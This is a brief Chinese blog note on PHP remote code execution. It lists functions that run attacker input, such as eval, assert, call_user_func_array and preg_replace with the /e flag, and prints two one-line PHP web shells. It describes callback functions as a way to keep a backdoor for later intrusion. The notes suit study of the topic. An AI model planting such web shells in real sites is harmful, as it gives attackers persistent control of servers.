RCE随笔(1)

哪些是可以执行代码执行:php代码。

eval

如:eval:<?php eval($_post['key']);

eval:php中不被叫做函数叫动态执行命令

assert:执行函数

call_user_func_array

<?php call_user_func_array('assert',array($_REQUEST['shu']));

传入xxs-labs/test.php?shu=phpinfo();

回调回门(用于留后门的,方便下次渗透):

回调后门的闭住:call_user_func()

call_user_func_array()

call_user_func

array_filter

arrya_map

uasort、uksort、array_walk、array_walk_recursive

preg_replace

当匹配的格式有**|e**的时候匹配到的字符会投到eval里面执行

哪些是可以执行命令:服务器的命令。

相关推荐
凳子(刘博浩)2 小时前
决策树的笔记
笔记
喜欢你,还有大家5 小时前
Linux笔记7——shell编程基础-1
linux·运维·笔记
山中月侣5 小时前
Java多线程编程——基础篇
java·开发语言·经验分享·笔记·学习方法
m0_678693337 小时前
深度学习笔记34-YOLOv5调用官方权重进行检测
笔记·深度学习·yolo
AI视觉网奇10 小时前
zsh 使用笔记 命令行智能提示 bash智能
linux·运维·笔记
于越海10 小时前
Python工程师向项目管理转型的深度分析与学习道路规划
笔记·python·学习
风和日丽 随波逐流13 小时前
java17学习笔记
笔记·学习
ReedFoley1 天前
【笔记】动手学Ollama 第五章 Ollama 在 LangChain 中的使用 - Python 集成
笔记·langchain
Mr Sorry1 天前
Non-stationary Diffusion For Probabilistic Time Series Forecasting论文阅读笔记
论文阅读·笔记
南猿北者1 天前
Cmake学习笔记
笔记·学习·策略模式